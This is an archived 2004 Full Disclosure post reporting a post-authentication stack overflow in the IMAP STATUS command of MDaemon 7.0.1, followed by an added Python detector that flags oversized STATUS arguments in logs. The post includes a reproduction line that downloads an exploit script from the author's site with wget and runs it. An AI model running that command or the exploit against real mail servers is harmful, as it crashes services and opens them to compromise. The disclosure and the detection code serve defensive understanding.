Full Disclosure mailing list archives
Mdaemon 7.0.1 IMAP overflow.
From: ned <nd () felinemenace org>
Date: Tue, 11 May 2004 22:26:13 -0700 (PDT)
Let it be known that this bug is after authentication ("postauth") and therefore useless.

In the current version of Mdaemon from ALTN there exists an easy-to-exploit, run-of-the-mill stack overflow. By authenticating and sending a large argument to the STATUS command in the IMAP component, a buffer will be overflowed, and an access violation will be caused.

To reproduce:

    cd SMUDGE;wget http://felinemenace.org/~nd/SMUDGE/Mdaemon/Mdaemon7.0.1Stack.py; python Mdaemon7.0.0.1Stack.py

Change the user and password first.

Thanks to:
- Dave Aitel for his neat spike scripts which convert to SMUDGE scripts quite easily :)
- rootkit.com

Not sure if the vendor knows about it.

Thanks,
nd

ps: second public release from the UBC, we have to make space for the new vulns :)

--
http://felinemenace.org/~nd
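
A defender-side check for the condition described in the post above, as an added example that is not part of the original message or of SMUDGE: it measures the mailbox argument of IMAP STATUS commands (atom, quoted string, or literal) in logged client lines and flags oversized ones. The 255-byte limit, the function names, and the sample lines are assumptions made for illustration.

```python
import re

MAX_MAILBOX_LEN = 255  # assumed policy limit; the post gives no overflow length
# tag SP "STATUS" SP rest; command names are case-insensitive (RFC 3501).
_STATUS = re.compile(rb'^(\S+) STATUS (.*)$', re.IGNORECASE | re.DOTALL)
_LITERAL = re.compile(rb'^\{(\d+)\+?\}$')      # {n} or non-synchronizing {n+}
_QUOTED = re.compile(rb'^"((?:\\.|[^"\\])*)')  # body of a quoted string


def mailbox_arg_length(line):
    """Return (tag, mailbox length in bytes) for a STATUS command, else None."""
    m = _STATUS.match(line.rstrip(b'\r\n'))
    if not m:
        return None
    tag, rest = m.group(1).decode('ascii', 'replace'), m.group(2)
    lit = _LITERAL.match(rest)
    if lit:  # literal: the announced size is what the server will read next
        return tag, int(lit.group(1))
    quoted = _QUOTED.match(rest)
    if quoted:  # count characters after removing backslash escapes
        return tag, len(re.sub(rb'\\(.)', rb'\1', quoted.group(1)))
    return tag, len(rest.split(b' ', 1)[0])  # atom ends at the first space


def flag_oversized_status(lines, limit=MAX_MAILBOX_LEN):
    """Return (line_no, tag, length) for each STATUS mailbox longer than limit."""
    hits = []
    for no, line in enumerate(lines, 1):
        parsed = mailbox_arg_length(line)
        if parsed and parsed[1] > limit:
            hits.append((no, parsed[0], parsed[1]))
    return hits


# Constructed client-to-server lines for illustration (not captured traffic).
SAMPLE = [
    b'a1 STATUS INBOX (MESSAGES UNSEEN)\r\n',
    b'a2 status "Sent Items" (MESSAGES)\r\n',
    b'a3 STATUS ' + b'A' * 4000 + b' (MESSAGES)\r\n',
    b'a4 STATUS {9000}\r\n',
    b'a5 STATUS "' + b'B' * 300 + b'" (UIDNEXT)\r\n',
]

if __name__ == '__main__':
    for no, tag, n in flag_oversized_status(SAMPLE):
        print(f'line {no}: {tag} STATUS mailbox argument is {n} bytes')
```

For a literal, the check reads the announced size from the command line itself, so the oversized request is flagged without needing the bytes that follow it.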